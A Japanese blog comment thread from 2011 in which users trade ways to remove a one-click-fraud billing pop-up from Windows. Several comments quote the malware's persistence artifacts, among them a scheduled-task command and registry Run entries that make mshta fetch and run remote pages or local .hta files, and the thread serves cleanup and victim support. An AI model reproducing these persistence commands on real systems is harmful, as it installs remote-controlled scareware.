ただ、削除できないし、右クリックしても「名前を変更する」という項目がないので拡張子を変えることができず、ドキュメントを開いても属性を変えることができませんでした。
そのほか色々なことをしたので、これが元凶なのはわかるのですが、どうにも出来ませんでした。
この意味不明なファイルを使用不可能にできればいいのですが…

[ 2011/03/14 14:14 ] [ 編集 ]

Re: うぁぁ

一度、請求画面は消えていたのですよね？
それとも3/7以来、一度も再起動しなかったということですか？
ご家族との関係上、パソコンの初期化という選択肢も無理でしょうね？

管理者権限がないので、かなり難しいと思うのですが、
わかる方がいらっしゃったら、よろしくお願いいたします。

[ 2011/03/14 16:32 ] [ 編集 ]

phpという名のファイル

「hta」の拡張子のファイルが検索しても存在しなかったので、「php」で検索したところmap～というファイルが一件該当しました。それを削除したところ、その後は一切広告が出てこなくなりました。ほんと、やっかいなものをクリックしてしまいました。

なかなか削除できないときはデスクトップ画面左下のスタートメニューをクリックして、スタートメニューアイコンのすぐ上にある検索のところに「php」と入れて検索してみてください。一件だけヒットがあればそれがあの広告のファイルです。

[ 2011/03/24 20:44 ] [ 編集 ]

Re: phpという名のファイル

該当したファイルをゴミ箱に入れて、広告が出なくなればそれが原因。
やっぱり広告が出るようであれば、
該当したファイルは別に使うファイルかもしれませんから元に戻せばいいですね。
新しい情報ありがとうございました。

[ 2011/03/24 22:57 ] [ 編集 ]

新手の手口が出てきました

こんにちは。
ここのサイトの情報は正しいので、感染した報告があった場合に紹介させていただいたりしています。

本日新しい手口が見えましたのでご報告させていただきます。

レジストリのいつもの場所に、感染するとこのようなエントリーが出来ます

schtasks /create /TN Quicktime /tr \"C:\\windows\\system32\\mshta http://***.***.***/User/bill2\" /F /sc minute /mo 1

Windowsのタスクを作るコマンドです。
タスク名はQuickTimeですので、いちおうこれの振りということでしょうか。

あまり創造性のない方法ですが、Windowsのタスクを削除してもレジストリに残っている限り、起動するたびに出てきますのでご報告まで。

[ 2011/03/26 14:42 ] [ 編集 ]

Re: 新手の手口が出てきました

情報ありがとうございました。
次から次に新手が現れますね。
最大の防御は怪しげなサイトに近づかないことでしょうね。

[ 2011/03/26 22:27 ] [ 編集 ]

とりあえず報告します

本当はもっと前に完了できたのですが、色々とあったので、今お伝えします。
駆除に成功しました！！
ダンプファイル法と謎のデータをいじったことでしっかりと居場所を突き止めた後、検索せずにしっかりとファイルをさぐっていくと、それらしい物があったので削除をしました。すると、画面に「例の画面」が現れなくなりました！
（どのファイルかは安心してデータを捨ててしまったため、ここに記述することはできません；すみません）
私には何があったのかわかりませんが、今度こそちゃんと消えてくれたようです。
そして、私の質問に答え、色々な手段を教えてくださった月桂樹葉さん始め、書き込んでくれた方々もありがとうございます！私自身、このサイトに必要なさそうなことばかり書いていて、さすがに迷惑だと思っていましたが、それでも答えてくれました。おかげで慌てず対処出来たほか、パソコンにも少し詳しくなれました。
この経験をいかして、周りでかかってしまった人がいたら助けます！
これからはサムネイルにほいほいされないよう、こころがけます（_ _ﾍﾟｺﾘ

[ 2011/04/03 14:59 ] [ 編集 ]

Re: とりあえず報告します

お役に立てばさんの方法などでうまくいったということですね。
良かったです(^^♪
10代の方だと思いますが、
皆さんにきちんとお礼を述べられていて好感が持てます。
また、思い出したことなどがありましたら、ご報告くださいね。

[ 2011/04/03 20:10 ] [ 編集 ]

ありがとうございます！

参考にさせていただきました！
ありがとうございます！

マイドキュメントフォルダの下にmapping_XXX...XXX.vbsというvbスクリプトを仕込まれ、スタートアップでそのvbスクリプトを呼び出す仕組みでした。

vbsファイルのファイル名でレジストリエディタ内を検索し、当該レジストリを削除することで対処しました。

このサイトを見なかったらもっと駆除に時間が掛かってました。ありがとうございます。

[ 2011/04/09 00:36 ] [ 編集 ]

Re: ありがとうございます！

わかりやすいご報告ありがとうございました。
他の方の駆除の参考になると思います。

[ 2011/04/09 01:23 ] [ 編集 ]

御参考

標準的な駆除方法では消えませんでしたが、このサイトによりVBスクリプト変種である事を知り、駆除出来ました。有難う御座いました。

御参考迄に当方の状況は、ダウンロードフォルダに「vespa_e6cd0a628b973e30c6a8b81cf422181504762f78.vbs」なるVBスクリプトを作成され、「コンピュータ\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1F20D025-7781-49A6-AD84-A56F62D871F3}」でPathを通されていましたので、このキー及び上記VBスクリプトに加え、「C:\Windows\System32\Tasks」の上記VBスクリプト呼び出しを削除しました（これでOKですよね？）。

この様に悪質な業者を訴える事は出来ないのでしょうか（URL等わかるので特定可能だと思います）？

[ 2011/04/10 00:02 ] [ 編集 ]

Re: 御参考

ていねいなご報告ありがとうございました。

> （これでOKですよね？）。
OKだと思います。

> この様に悪質な業者を訴える事は出来ないのでしょうか（URL等わかるので特定可能だと思います）？

URLは、すぐ変わってしまうようですが、有用な情報は
警察のサイバー犯罪相談窓口
http://www.npa.go.jp/cyber/soudan.htm
が通報窓口のようです。
（後日談をご覧ください。）
でも相手を特定しようとして、自分から連絡をとらないようにしてくださいね。個人情報が流れると厄介です。

(後日談）
上記の相談窓口に対応を伺ってみました。
ここは、実際に被害にあったときの対応をする所なので、
被害にあってない場合は、消費者生活センターに知らせてほしいそうです。
消費者生活センターを通して行政処分をする場合もあるそうです。

[ 2011/04/10 01:04 ] [ 編集 ]

PC初心者の友人が感染したらしく、こちらのサイトを参考にしながら電話で指示して修復しました（初心者にレジストリエディタを触らせるのは怖かったのですが・・・）。
結局、レジストリエディタの「編集」→「検索」で、キーワードに「php」を入れて検索させたところ、
　名前：コマンド
　データ：mshta http://（アダルトサイト）/regist2.php
が見つかったので、それを削除したところ治りました。
友人共々、大感謝です。ありがとうございました！

[ 2011/04/10 22:09 ] [ 編集 ]

Re: ありがとうございました！

友人思いのfukuさん、ご報告ありがとうございました。
アダルトサイトのURLが入っているレジストリであれば、ビンゴですね。

[ 2011/04/11 02:26 ] [ 編集 ]

お礼を言いたかった

[ 2011/04/13 18:31 ] [ 編集 ]

Re: ありがとうございます

お気持ち伝わりました(^^)

[ 2011/04/13 18:41 ] [ 編集 ]

とても参考になりました。
ありがとうございました。

[ 2011/04/14 10:34 ] [ 編集 ]

実はワンクリに引っかかって3ヶ月もほったらかしにしていました。
そして友達がワンクリに引っかかったと言っていたのを聞き、「もしやワンクリ・・？」と思い、検索したところ、
ここにたどり着きました。
それでです。悪さをしているのは「mshta.exe」。実行
しているユーザーは自分らしい。引っかかったサイト名
で検索すると、ワンクリだと判明。
【駆除方法１】試したところ見つからず。
【駆除方法２】それも見つからず。
といったところですとても答えづらいかもしれませんが
、簡単に言うと「どうしたらいいですか？」ということです。長々書いてすみません。よろしくお願いします。

[ 2011/04/18 18:55 ] [ 編集 ]

まささん、ひろさん

まささん、どういたしましてです。
ひろさん、
【削除方法３】、【その他の削除方法】も参考にしてみてください。
それでも、だめな場合は初期化という手もあります。

[ 2011/04/18 21:03 ] [ 編集 ]

すいません、またなんですが

最近は自分しないのですが、一応家族で使っているため、
出来るだけ知られたくないので、電話とかメールは・・・
。システムの復元はなんとかかんとか権限（アドミニストレーター？みたいなの）が無いので出来ないっぽいです。
一時的には消せるんですが・・。
何か出来ませんでしょうか・・・

[ 2011/04/18 21:40 ] [ 編集 ]

Re: すいません、またなんですが

コメント欄にも解決方法がいろいろあるので、参考にしてみてください。
特に猛毒きのこさんの奮闘は参考になると思います。

当方としては、ご家族にカミングアウトして
管理者権限のあるアカウントから直すことを推奨します。

前にも書きましたが、変なサイトでなくても
ワンクリ画面が出ることがありますから。

[ 2011/04/19 00:03 ] [ 編集 ]

死闘の末なんとか削除できました。

[ 2011/04/19 20:07 ] [ 編集 ]

Windows7 ユーザappdataroaming配下

ひろさん、死闘とは、がんばりましたね

よろしかったら削除方法を公開していただけると他の方も助かると思います。

[ 2011/04/19 20:41 ] [ 編集 ]

レジストリに以下のものが追加されてました。
レジストリとファイル(cars.hta)を削除して表示されなくなりました。

"cars"="C:\\WINDOWS\\system32\\mshta.exe \"C:\\Documents and Settings\\ユーザ名\\Application Data\\cars\\cars.hta\""

[ 2011/04/26 22:53 ] [ 編集 ]

Re: Windows7 ユーザappdataroaming配下

Application Dataの下に隠れているのもあるのですね。
ご報告ありがとうございました。

[ 2011/04/26 23:37 ] [ 編集 ]

助けて下さい！

上記【[ 2011/03/24 20:44 ] あ】さんの【phpという名のファイル】を試したらヒット！、まさに日時がそれだったので削除したのですがダメでした。ゴミ箱の中身も全部削除してもＮＧ（＞＜）該当のものでもダメなのは何ででしょうか？ちなみに、当方は【vespa_8c6b328577b6e276c5809a0eccab6fe18dcfeba3
】種類　VBScript Script ファイル　というものでした。ご回答宜しくお願いします！

[ 2011/05/02 01:17 ] [ 編集 ]

Re: 助けて下さい！

2011/04/10 00:02 の「御参考」という通りすがりさんのコメントを見てください。
通りすがりさんは、3種類削除していますね。
同じようにしてみたらどうでしょうか。

[ 2011/05/02 02:38 ] [ 編集 ]

ダメでした…

ご回答ありがとうございます。

実はさっきから４時間以上格闘しております。(vista）

上記コメントを一通り拝見し、色々試しています。
「御参考」という通りすがりさんのコメントも試しましたがダメでした。

復元については感染した何日か後にプログラムの更新？をしてしまっているので意味ないですよね？（復元できる日付が表示されましたがそれ以前の感染でしたので）

htaファイルはヒットなし。

一昨日色々試している工程で、「あなたのPCに悪意ある請求プログラムをインストールしようとしています」「悪意あるインストールを拒否できません」のような警告がでたのですが、わけもわからずクリックしてしまったような気がして、後からワンクリックウェア詐欺というものなのかもとかなり不安になってしまっています。

長文で申し訳ありませんが、良いアドバイス等ありましたらご教示願います。

[ 2011/05/02 04:21 ] [ 編集 ]

Re: ダメでした…

> 後からワンクリックウェア詐欺というものなのかもとかなり不安になってしまっています。
>
こちらから、連絡をとらなければ心配することはありませんが、
何か心配なことがあれば消費者生活センターに相談してみると良いと思います。

復元ポイントがないということですので、もう少し詳しく教えてください。
どういう症状ですか？
再起動してもすぐ請求画面が出てくるとか、時間が経つと請求画面が出てくるとか、
何をしても全く請求画面が消せないとか。
また、削除したのはphpという文字列を含んでいるファイルですか？
TASKSやレジストリに怪しいものは見つからなかったということですか？

詳しい情報を公開していただければ、
御覧になっている方で解決法を教えてくださる方がいらっしゃるかもしれません。

なお、vbsファイルを検索してみるのも良いかもしれません。

[ 2011/05/02 13:49 ] [ 編集 ]

遅くなりました・・・

お返事遅くなりました。m(_ _)m
実は、自分でも良くわからないのですが請求画面でなくなりました。
恐らく、「御参考」さんの内容を試した後だと思われます。
当方の場合、「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\vespa_8c6b328577b6e276c5809a0eccab6fe18dcfeba3」この場所にあったこのファイルが感染した日時のものでした。
これを削除した後にも請求画面が出たり消したりの繰り返しだったのですが、Alt+F4で画面が消え、さらに再起動したらそれから出てこなくなりました。
これって成功？ってことかな…
とりあえずは一安心です。
色々とご指導いただき本当にありがとうございました。

そして、今は友人からすすめられた「アバスト」という無料のセキュリティソフトをダウンロードして今後二度とワンクリック詐欺にはひっかからないよう気をつけようと思っています。

[ 2011/05/04 00:40 ] [ 編集 ]

Re: 遅くなりました・・・

消えたとの事、良かったです。
詳細なご報告をありがとうございました !

[ 2011/05/04 14:34 ] [ 編集 ]

こんばんは

システムの復元でとりあえずは出てこなくなりましたが、これは根本的な解決になっているんでしょうか
言葉の通り前の状態に戻すのであれば大丈夫だとは思いますが

システムの復元がなんなのか良く分かってなくてすみません(＾o＾)

[ 2011/05/05 04:19 ] [ 編集 ]

Re: こんばんは

> システムの復元でとりあえずは出てこなくなりましたが、これは根本的な解決になっているんでしょうか

根本的な、の意味はいろいろですが、
出てこなくなれば、画面を消すのに成功した（解決した）と言っていいでしょう。

ワンクリック請求では、レジストリを変えられて画面が出ていることが多いので、
復元によって、レジストリを前の状態に戻すわけです。

[ 2011/05/05 21:36 ] [ 編集 ]

おかげ様で消えました。とてもわかりやすい説明で助かりました。
私はVISTAだったのですが、「システムの復元」で直りました。

ただ、私の場合は
・「システムの復元」を最初しようとしたところ「すで　　に起動中」（正確な文面は忘れました、すみませ　　ん）的なことになり、できず
・下にあった「メモリ診断ツール」をしたところ、勝手　に再起動され、何の表示も出ませんでしたが
・その後もう一度「システムの復元」をしたらできるよ　うになっていて、日付を前に戻したところ直りました

ウイルスバスターも入れてるし、お笑い動画を見ようとしていたので大丈夫だと思っていました。で、リンクを押してポチポチしてたらアダルトサイトになってて感染しました。
当たり前ですが、やっぱりよく見ないとだめですね。そしてセキュリティーソフトを入れてれば安心という慢心も危ないとわかりました。
なんにせよ月桂樹葉さんのおかげで助かりました。
ありがとうございます。

[ 2011/05/06 14:38 ] [ 編集 ]

今後の心構えがナイスです

vistaの復元時のご報告ありがとうございました。

[ 2011/05/06 16:16 ] [ 編集 ]

以下の内容のコメントをいただきました。
初心者向きに書いていただいたのですが、
それでもわかりにくいところがありましたので、要点を中心に編集させていただきました。
ご容赦を。
********************

名前:糞サイトはコロス
タイトル:糞サイト情報

パソコンを再起動して請求画面が出てきた時にブラウザの履歴を確認します。
Internet Explorerのお気に入りの隣の「履歴」をチェック
そこに請求画面サイトが表示されてます。
分からなければ今日の履歴を消して再度起動すれば
請求画面のサイトの履歴が「今日」のところに表示されています
そのサイトのアドレスを見ます
出て無ければその履歴のサイトの名前にマウスを当てて右クリックすると
プロパティが出て来てアドレスが載ってるのでそのアドレスをコピー

左下のスタートを押して右側にある「検索」でアドレスを貼り付けて検索する
（月桂樹葉：検索の時は「ファイルに含まれる単語」の欄に貼り付けるということですね。）
出てきた関連ファイルで削除したほうがいいものを削除

出て来た糞サイトのCookie
↓↓↓↓↓↓↓↓
owner@aduit-mov[1]
アドレスはhttp//aduit-mov(変形しました)

また消し方を書きに来ます

********************

レジストリの中などもそのアドレスで検索するといいかもしれませんね。
請求画面がダウンロードされたhtaファイルを表示している場合でも
そのファイル名がInternet Explorerの履歴に表示されますね！
（既定ブラウザがInternet Explorerでなくても。）
ユニークな方法をありがとうございました。すばらしい！

[ 2011/05/21 22:56 ] [ 編集 ]

以下は糞サイトはコロスさんの上の投稿の続きです。あえて未修正にしました。
順番が逆になってしまうため、新コメントとして載せさせていただきました。

この方法は、上記のサイトhttp//aduit-mov/からの請求画面を消すための方法のようです。
あくまでも自己責任で。初心者には荷が重いかも。初心者は復元がオススメ。

なお、下記のhttp//windows-service6248.me/というサイトは、
http//aduit-mov/のサイトにリダイレクトしています。
また、糞サイトというのは、請求画面を出しているサイトです。念のため（汗）。
（ここまで月桂樹葉）

********************

名前:糞サイトはコロス

左下のスタートをクリック
右側にファイル名を実行

ってのがあるのでそこをクリック
そしてregditって文字を打つ

レジストリエディタが出て来たら左上の編集をクリック
そして検索でmshta.exeを検索

検索して糞サイトのアドレスが無いか確認

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

有れば右側の名前のとこでアドレスを消去

名前
system_boot_Ta4rimpfxXitb7B2lsKLFyxDaysASBAE

ココに糞サイトの情報が出て来ます

データ
C:WINDOWSsystem32mshta
http//windows-service6248.me/reg2.php?cccid=Ta4rimpfxXitb7B2lsKLFyxDaysASBAE

データの中にmshtaの後に
http//windows-service6248.meアドレスが出てるので糞サイトだと分かります

次に再度糞サイトのアドレスで編集のとこから検索

するとHKEY_CURRENT_USERSoftwareMicrosoftSearch AssistantACMru

ココに糞サイトの情報が別で出て来る
フォルダーに数字で5063と5064に糞サイトが潜んでます

こんな感じのが出てきます
００　　５７
０１　　mshta.exe
０２　　Index.dat
０３　　adult
０４　　annai

取り合えず糞サイトのアドレスと
其れらしいadultやannaiを消す

レジストリなので一応mshta.exeは残して置きます

（再起動しても出て来たら5063と5064のフォルダー事再度消して下さい）

消したらタスクマネージャーに戻ってmshta.exeを
プロセスの終了を押すと糞サイトは画面から消えます

プロセスで消したらタスクマネジャーを終了
次にレジストリエディタを終了

でパソコンを再起動で出て来なければ終了です

パソコン内に残ってるゴミを消したい場合は上に書かれてる方同様にプログラムを開かなければ行けないので糞サイトが立ち上らなければこのまま放置でも機能して無いゴミなので無視で良いと思います

どうしても消したい方は上の方のシステムファイルの表示を参考にすると良いと思います

********************

[ 2011/05/21 23:46 ] [ 編集 ]

XP使いです。
検索してもhtaファイルはヒットしなかったのですが（拡張子を含まずファイル名だけで検索していたらしい）
msconfig入力したときに見つかりました。
私の場合は
c:documents and settings\allusers\application data\vu931　の中で
ttp://www.yy7456.com/member/pay.php　のものです。
肝心のhtaファイル名は羅列ではなくて、あの勝手に何回も表示される画面に出ていたユーザーIDでした。
（でもこれ、もしかしたらこのサイトに限って言えば全員ID同じかもしれませんね。）

[ 2011/05/25 15:46 ] [ 編集 ]

私も映画関係のリンクを追ううちに『洋画は邦画と違い、しっとりしたsexシーンをボカスことなく堂々と入れる、たとえば…』から見事にひっかかってしまいました。

OSはVistaです。

まずは常駐のアンチウィルスソフトで「高度のチェッック」をすれども「問題なし」ときてまったく役に立たず、
海外のスパイ駆除ウェア（フリー）を２つ試せば「駆除に成功」しても再起動すれば元の木阿弥。

数時間の冷や汗・油汗まみれの格闘の後、こちらのサイト様に出会いまして…

【駆除方法１】msconfig→「スタートアップ」からポップアップのリンク先"ttp://1340.adult109.com～以下略"を呼び出すmshtaコマンドからチェックを外してもダメ。
レジストリの\Runを何度見直しても怪しげなものはなく、拡張子を表示しての".hta"検索は数多く出てくるものの該当ファイルに自信がなく正直ギブアップ。

【駆除方法２】でC\Windows\System32\Tasksの中に"boot8836304"というファイルを発見、この数字が上記の方と同じくポップアップで暗記できるほど見た「登録されたあなたのIDナンバー」だったのです。
これを完全削除！…でやっと終わりました。

最終的に初期化に覚悟もしていたので、月桂樹葉様の丁寧なご説明＆皆様のコメントがとても役立ちました。
本当にありがとうございます。

[ 2011/05/31 04:23 ] [ 編集 ]

会費請求画面

おはようございますー
質問なんですが・・・
この画面が出始めるとほぼ同時に「Tアンケート」
というメールを受信したのですが
メールアドレスを入力した覚えがないのにどうやって
届いたのでしょうか？

メール内容はアンケートを称して住所名前等の
個人情報を引き出すのが目的のようなので
放置してます

ネット通販等で買い物したりするので
ハードディスク内にあるキャッシュ等から個人情報が
抜かれないか心配です；；

[ 2011/05/31 06:57 ] [ 編集 ]

XP使いさん、Hさん、お二人とも請求画面のIDがファイル名に使われていたのですね。情報ありがとうございました。

aikoさん、別のウィルスなどを一緒にダウンロードした可能性がなきにしもあらずです。まずは信頼のおけるソフトでハードディスク内を完全スキャンすることをオススメします。
(追記）
TSUTAYA関係のメールにもTアンケートという名前のものがありますが、心当たりはありませんか？

[ 2011/05/31 18:03 ] [ 編集 ]

削除成功：VBScriptを使った手口でした

月光仮面さんから、＊＊＊以下のコメントをいただきました。

MyDocument下にvbsファイルを置くパターンも増えているのですね。
(コメントに2,3似たパターンがあります。）
ていねいなご報告ありがとうございました。助かる方もいると思います。

サイトのリンクがあったので、面白がって踏む人がいないように編集させていただきました。すみません。
＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊

初めまして、月光仮面です。上の対策記事は大変参考になりました。どうもありがとうございます。
数時間前にmshta.exeを働かせるワンクリック詐欺にかかり、削除に成功しましたので報告します。
私の場合、VBScriptを使った手口でした。
OSは、Windows 7です。
その手口ですが、C:User(私のユーザー名)Documents下に、
cloth_5a858dc60b98c7e9279a1039ee68de5e370e2c7f.vbs
という、VBScriptが置いてあり、レジストリーの、
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun
で、
cloth_5a858dc60b98c7e9279a1039ee68de5e370e2c7f
のキー名でそのVBScriptを働かせるデータを書いていました。
そのレジストリーとVBScriptを削除して、問題は解決しました。
そのVBScriptには、
"system32mshta ttp://guidance.chamaeleonmovie（中略）/player_view.php?(中略）
5a858dc60b98c7e9279a1039ee68de5e370e2c7f"
という直接の指示をmshta.exeに出す方法で詐欺画面を表示させていました。
上の記事にある方法ではなかったので、参考になればと思いコメントしました。
なぜ気が付いたかというと、相当の試行錯誤の後に、自分のDocument下に変なVBScriptがあるのに気付き、そのソースコードを見てわかりました。

[ 2011/06/21 03:26 ] [ 編集 ]

知り合いが泣きながらノートPCを持ち込んできました。

当サイトを参考にして請求表示を消すことができました！ありがとうございました。

最初は焦ってしまい、振り込んですませようかとか考えてしまったのですが、週末だったのが幸いし一晩寝たら多少は冷静に(笑)。以下の事に気づく事ができました。
・向こうは請求をしようにもこちらの情報を知らないハズである。環境変数から情報入手したとしてもプロバイダのIP止まりと思われる。
・連絡などをしたら、かえってこちらの情報を渡す事になる。
以上から請求は無視、表示を消す方に頭を切り替える事にしました。
そしてタスクマネージャなどを参考にしてmshta.exeが請求表示をしているらしいと推測、最初は削除してみたのですが、再起動すると復活。ウェブ検索でこちらのサイトを見つけ、レジストリのHKEY_CURRENT_USERの方の～\CurrentVersion\RunにワンクリサイトのURL(その下のフォルダのファイルを指定していた)を発見しました。
そこで喜んで消してしまったので、そのキーと値の正確な記述はここに書けない(失敗！)のですが、IEを使ってそのURLの請求画面を表示させていたようです。

大した情報もないのに長文コメントしてしまってすみませんでした。でも、とても嬉しかったのです。
そしてなにより、「同じような状況から同様に対処した人がいる」という事実、「請求は無視すべき」と明言された事が、どれだけ安心に繋がったか。本当にこのようなサイトをつくられていることに感謝致します。

[ 2011/06/26 06:50 ] [ 編集 ]

Re: 助かりました！

うまく解決できたとのこと、当方もたいへん嬉しいです！

コメントは新しい情報を書かなければならない、ということはないのですが、
”請求画面が出たときには、冷静に対処すべき”という貴重なご意見でした。
もっとも、うかつを反省さんは冷静になったからこそ、当サイトにいらしたわけですが。

[ 2011/06/26 09:10 ] [ 編集 ]

Re: ワンクリック詐欺ウェア

secretモードで次のようなコメントをいただきました。secretモードでしたのでお名前は伏せておきます。

> HKEY_LOCAL_MACHINESOFTWAREMicrosoftShared ToolsMSConfigstartupreg（ワンクリックウェア名）
>
> にも潜んでたりしましたよ(^^)
> msconfigでフォルダ名が確認できたの
> レジストリでフォルダまるごと消して解決しました。

たぶん、この方はmosconfigのスタートアップで（ワンクリウェア名）のチェックをはずした方だと思われます。
チェックをはずすと、上の場所に（ワンクリックウェア名）が表示されます。
チェックをはずしても（ワンクリックウェア名）がスタートアップには残るので、それを消したい場合は上のような操作をするといいですね。コメントありがとうございました。

[ 2011/06/29 13:11 ] [ 編集 ]

secretで
> パソコン初心者で駆除方法１のmsconfigで
> スタートアップから削除したのみなのですが、これでは不十分なのでしょうか…？
という質問をいただきました。
初心者さんの場合、もう画面が表示されないようなら、レジストリをいじらず、そのままでいいと思います。

[ 2011/06/30 22:31 ] [ 編集 ]

助かった！

こんにちわ～
お初です

ワンクリックに見事に引っかかりました（笑
キャンペーン中とかでカウントダウン付だったんで
焦ってたんですが、このサイトのおかげで
気が楽になりました。ありがとうございます（＾＾＊）

熟練者の壁は越えられませんでしたが、
他の有志のお方の「復元」という方法は初心者の私には
効果テキメンな方法でした！！

このサイトの存在をありがたく思います♪
お世話になりました～（＾＾）ノシ

[ 2011/07/05 17:27 ] [ 編集 ]

Re: 助かった！

お初で嬉しいですヽ(´▽｀)/

[ 2011/07/05 20:49 ] [ 編集 ]

MEW（タイ人です）

始めまして。
駆除方法１で解決できました。誠にありがとうございます。
その方法でデータを一つも消さないままで済むですが、やっぱり原因であるデータはまだ残っているではないかと考えましたので、上記の様々な方法で怪しげなデータを探してみました。
ですが、ＲＵＮの中にも、他の所も見つかりませんでした。
trendmicroに載っている方法で探しても、htaかそれっぽい物は全く見つかりませんので、ちょっと不安です。

最初から侵入したデータが無いなのか、自分は見つからないだけなのか。
正直、これからどうすれば良いだろうか、またはこのまま放って置いてもいいかは分かりません。

どうか、月桂樹葉さんの意見をいただきたいです。

私の日本語はちょっと分かりにくいかもしれません。本当に申し訳ございません。

（ちょっと恥ずかしいながら、今回の原因でありそうなサイトは、たぶんアレ的なサイトですので、やっぱり侵入したデータがあるではないかと思います。）

[ 2011/07/09 11:19 ] [ 編集 ]

すみません。
もう一つ聞きたいことを書き忘れました。

この問題が発生した後、当日に私のパソコンのWindowsがアプデートされました。
この場合、システムの復元を行ったら、問題が起こるでしょうか？
ＩＰＡのサイトではパソコンが起動しなくなるといった状態になる可能性もあると書いてありますので、やっぱり怖いです。

どうか、ご意見をお願いいたします。

ＰＳ．私のパソコンはWindows7を使ってます。ご参考になれば、幸いです。

[ 2011/07/09 11:34 ] [ 編集 ]

Re: MEW（タイ人です）

はじめまして。
レジストリの中にもなく、コメント欄で寄せられた新しい情報の中にも該当するものがない場合、
しばらく様子をみていいと思います。
会社のPCで、2度と画面が現れては困る場合は、駆除方法２もチェックしてくださいね。
他のウィルスも一緒に入っていないか心配な場合は、ウィルスソフトでフルスキャンしてみてはいかがでしょう。

[ 2011/07/09 11:46 ] [ 編集 ]

ありがとうございます。

Ａｖａｓｔで全部スキャンしてみました。
ウィルスがないようです。
会費請求画面はもう現れないですし、ウィルスも見つからないなら、たぶんこれで問題ないでしょう。

ご意見いただいて、誠にありがとうございます！

[ 2011/07/10 16:24 ] [ 編集 ]

こちらを参考にさせていただいたので、お礼に症例を報告させていただきます。
まずレジストリが
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\weberomd
command
mshta "C:\Documents and Settings\All Users\Application Data\eromd\XXXXXXXX.hta"
eromdの中身が
2.dat, bg.jpg, XXXXXXXX.hta
で問題のポップアップでした。
つい最近かかったそうでしたが、こちらでは去年からの騒ぎだったのですね。
ありがとうございました。

[ 2011/07/11 15:06 ] [ 編集 ]

MEWさん、良かったです。
印刷屋さん、ご報告ありがとうございました。
Application Dataの下にそのフォルダがあったのですね。
お知り合いは印刷屋さんのおかげで、嬉しくてまた泣いてしまったことでしょう。

[ 2011/07/11 19:24 ] [ 編集 ]

mshtaで解除できない方へ

こんにちは。
本日mshta以外の感染方法を確認したので書いておきます。

今度はrundllを使ってます。

記述されるレジストリキーはmshtaと同じRunの場所に書かれていますが、書き方が違うのでmshtaで探しても見つからないでしょう。

ここを確認すると実ファイルのパスがわかりますが、中に入っているのはテキストファイルに偽装されたdllファイルや画像のようです。

このフォルダごと削除して、レジストリの項目を削除して再起動して動作確認してください。

[ 2011/07/18 12:48 ] [ 編集 ]

Re: mshtaで解除できない方へ

とおりすがりさん
新しいご報告ありがとうございました！

確認される方へ
rundllで見つかるものでも、正しく必要なものもありますので、
きちんと確認して大切なものは消さないようにしましょう。

[ 2011/07/18 20:53 ] [ 編集 ]

私の場合、vistaなんですが、マイコンピューター\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Runにいました。
とりあえずmshta.exeを消そうとしたんですが通常環境ではセキュリティがきつく消せないのでセーフモードでDOS環境で直デリートして画面は出なくなったんですが気色悪かったので参考にさせていただいて、REGと隠しファイル共に消せました。
ありがとうございました。

[ 2011/07/25 23:50 ] [ 編集 ]

非常に助かりました！！

親から怪しいサイトはみないようにいわれてたんですが、ついみたくなっちゃってアダルトサイトいったらワンクリック詐欺にあってしまいました。　
それで毎回請求画面がでるので焦って夜眠れなかったので親にいったらカンカンに怒られました（笑
無視してもでるので友達に相談してみたらこのサイトをみつけて方法１でやってみたらでなくなったので友達と
月桂樹葉さんに感謝しています
親にいわれてメアドとかを全部消すように言われたので残念です
今度からはそういう所にいかないようにしたいです
　　　長文申し訳ありませんでした！

[ 2011/07/26 00:10 ] [ 編集 ]

tacoさん
(ノ´▽｀)ノオオオオッ♪裏ワザ使いましたね。
mshta.exeは削除しなくていいということは、記事を読んでわかっていただけたと思います。

しじみさん
夜眠れないほどのたいへんな思いをしましたね。払いこまないで良かった！
ほほえましいコメントありがとう。

[ 2011/07/26 00:45 ] [ 編集 ]

お世話になりました

不本意にもカーソルの位置を確認しないままにクリックしてしまいわずらわしい事になってしまいました。
焦りましたが　こちらにたどり着き　冷静に対処したところ　その日の内に正常に戻すことが出来ました。
PC事情には疎い私で　月桂樹さんの示されたケースと合致はしなかったのですが　ひっかかった時間は分かっていたので　最後は時間を頼りに怪しげなファイルを削除したところ成功しました。　ありがとうございました。

[ 2011/07/30 17:22 ] [ 編集 ]

参考になりました

自分は最初の方法のどれにも該当していませんでした；
runも全部見てみたのですが、.exeだけみたいな感じで、
それと、動画を保存で見ていたらしく、もう一度クリックするともう一個増えてましたｗｗｗ
結局よくわかんなかったので、プロセスツリー終了？
を押してみたら(2個とも)、消えました、

再起動しても映りませんでした
他のファイルとかに支障は出ないでしょうか？

[ 2011/08/06 02:16 ] [ 編集 ]

ami*ami さん、 anonymsさん

消えてよかったですね。 anonymsさんにご意見のある方、よろしくお願いします。

[ 2011/08/07 00:09 ] [ 編集 ]

残滓が亡霊のように・・・

ワンクリックの不正請求に引っかかってしまい、ここのＨＰを参考にして、削除しました。しかし、ＰＣを起動すると必ず、残滓しも言うべきなのか、が亡霊のように立ち上がってきます。ちなみに、ソースの表示は
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=shift_jis" http-equiv=Content-Type></HEAD>
<BODY></BODY></HTML>
プロパティは
プロトコル:File Protocol
種類:HTMLアプリケーション
アドレス（URL）:file:///C:/ProgramData/utprc/5A54212S.hta
と表示されます。困り果てています。どうぞご教示下さい。

[ 2011/08/07 15:21 ] [ 編集 ]

追記

先ほどのアイアイです。
RegistryBooster 2011
SystemTweaker 2011
PowerSuite 2011
SpeedUpMyPC 2011
を次々と入手・インストールしましたが、ダメでした。
宜しくお願いいたします。

[ 2011/08/07 15:27 ] [ 編集 ]

Re: 残滓が亡霊のように・・・

復元は試されましたか？
C:/ProgramData/utprc/5A54212S.hta
ここに格納されているhtaファイルを削除してもまた生成されますか？
ファイルとフォルダすべての検索で「ファイルに含まれる単語または句」のところに　
